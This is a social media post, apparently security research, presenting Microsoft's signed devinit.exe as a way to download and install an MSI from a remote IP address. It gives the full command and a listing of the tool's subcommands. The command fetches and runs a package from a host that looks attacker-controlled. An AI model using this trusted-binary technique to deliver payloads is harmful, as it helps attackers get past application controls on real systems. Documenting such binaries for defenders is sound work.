



Settings



Post



mr.d0x
@mrd0x



devinit.exe - Great MS signed tool with tons of useful commands but needs VS to run properly.

I tested msi-install, it downloads a msi file to C:\Windows\Installer\ then installs it.

devinit.exe run -t msi-install -i http://10.0.0.18/out.msi

```
.\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\devinit>devinit.exe list /?
azurecli-login          Log in to Azure CLI.
choco-install           Invokes 'choco install' for the requested package or packages.config.
choco-upgrade           Invokes 'choco upgrade' for the requested package.
dotnet-restore          Runs .Net restore command.
dotnet-toolinstall      Installs .NET Core tools, updating existing installs if needed.
enable-iis              Enables IIS and installs the ASP.NET Core Windows Hosting Bundle.
msi-install             Installs a MSI when provided a path or URL.
npm-install             Installs Node.js if the required version is not present.
nuget-restore           Tool to restore the nuget packages.
require-azureartifactscredentialprovider Installs Azure Artifacts Credential Provider if it is not present.
require-azurecli        Tool to install latest version of Azure CLI.
require-choco           Installs Chocolatey if the minimum required version is not present.
require-dotnetcoresdk   Installs .NET Core SDK if it is not present on the machine.
require-dotnetframeworksdk Installs .NET Framework SDK if it is not present on the machine.
require-git submodule   Restore Git Submodule. Use local .gitmodules if no .gitmodules is passed in.
require-mssql           Runs the MSSQL install script.
require-nodejs          Installs Node.js if the required version is not present.
require-npm             Installs npm if the required version is not present.
require-nuget           Tool to install NuGet.
require-psmodule        Installs PowerShell modules.
require-vcpkg           Acquires vcpkg if not already available.
require-vscomponent     Imports VS components present in .vsconfig file.
require-winget          Installs the winget package manager.
set-env                Sets environment variables.
vcpkg-install           Installs packages using vcpkg.
windowsfeature-disable Disables Windows features.
windowsfeature-enable  Enables Windows features.
windowsfeature-list     Lists Windows features status.
winget-install          Installs the specified application using the winget install command given a package id.
wsl-install             Installs Linux distros for the Windows Subsystem for Linux.
```

4:43 AM · Nov 17, 2021

115 Reposts 350 Likes 52 Bookmarks



52



Don't miss what's happening

People on X are the first to know.

Log in

Sign up

Welcome to x.com!



We are letting you know that we are changing our URL, but your privacy and data protection settings remain the same.
For more details, see our Privacy Policy: <https://x.com/en/privacy>.

Did someone say ... cookies?

X and its partners use cookies to provide you with a better, safer and faster service and to support our business. Some cookies are necessary to use our services, improve our services, and make sure they work properly. [Show more about your choices.](#)

Accept all cookies

Refuse non-essential cookies